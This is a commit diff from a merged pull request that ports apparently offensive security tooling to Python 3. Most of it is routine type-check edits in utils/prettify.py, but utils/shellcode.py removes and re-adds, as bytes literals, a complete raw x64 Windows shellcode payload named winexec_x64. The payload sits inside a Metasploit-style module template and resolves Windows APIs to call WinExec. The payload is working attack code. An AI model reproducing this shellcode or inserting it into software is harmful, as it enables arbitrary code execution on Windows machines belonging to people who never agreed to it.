	14	+	return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()
18	15

■ ■ ■ ■ ■ ■

utils/prettify.py

		skipped 15 lines
16	16		table = prettytable.PrettyTable()
17	17
18	18		# List outputs.
19		-	if isinstance(data, (types.ListType, types.TupleType)):
	19	+	if isinstance(data, (list, tuple)):
20	20
21	21		if len(data) > 0:
22	22
23	23		columns_num = 1
24		-	if isinstance(data[0], (types.ListType, types.TupleType)):
	24	+	if isinstance(data[0], (list, tuple)):
25	25		columns_num = len(data[0])
26	26
27	27		for row in data:
28	28		if not row:
29	29		continue
30	30
31		-	if isinstance(row, (types.ListType, types.TupleType)):
	31	+	if isinstance(row, (list, tuple)):
32	32		table.add_row(row)
33	33		else:
34	34		table.add_row([row])
		skipped 3 lines
38	38
39	39		# Populate the rows
40	40		randomitem = next(data.itervalues())
41		-	if isinstance(randomitem, (types.ListType, types.TupleType)):
	41	+	if isinstance(randomitem, (list, tuple)):
42	42		for field in data:
43	43		table.add_row([field] + data[field])
44	44		else:
		skipped 40 lines

■ ■ ■ ■ ■ ■

utils/shellcode.py

		skipped 8 lines
9	9		'Arch' => ARCH_X64,
10	10		'Payload' =>
11	11		'''
12		-	winexec_x64 = ""
13		-	winexec_x64 += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
14		-	winexec_x64 += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
15		-	winexec_x64 += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
16		-	winexec_x64 += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
17		-	winexec_x64 += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
18		-	winexec_x64 += "\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
19		-	winexec_x64 += "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
20		-	winexec_x64 += "\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
21		-	winexec_x64 += "\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
22		-	winexec_x64 += "\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
23		-	winexec_x64 += "\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
24		-	winexec_x64 += "\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
25		-	winexec_x64 += "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
26		-	winexec_x64 += "\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
27		-	winexec_x64 += "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
28		-	winexec_x64 += "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
29		-	winexec_x64 += "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
30		-	winexec_x64 += "\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
31		-	winexec_x64 += "\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
32		-	winexec_x64 += "\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
33		-	winexec_x64 += "\x00\x59\x41\x89\xda\xff\xd5"
34		-
	12	+	winexec_x64 = b""
	13	+	winexec_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
	14	+	winexec_x64 += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
	15	+	winexec_x64 += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
	16	+	winexec_x64 += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
	17	+	winexec_x64 += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
	18	+	winexec_x64 += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
	19	+	winexec_x64 += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
	20	+	winexec_x64 += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
	21	+	winexec_x64 += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
	22	+	winexec_x64 += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
	23	+	winexec_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
	24	+	winexec_x64 += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
	25	+	winexec_x64 += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
	26	+	winexec_x64 += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
	27	+	winexec_x64 += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
	28	+	winexec_x64 += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
	29	+	winexec_x64 += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
	30	+	winexec_x64 += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
	31	+	winexec_x64 += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
	32	+	winexec_x64 += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
	33	+	winexec_x64 += b"\x00\x59\x41\x89\xda\xff\xd5"

Merge pull request #18 from antonioCoco/py3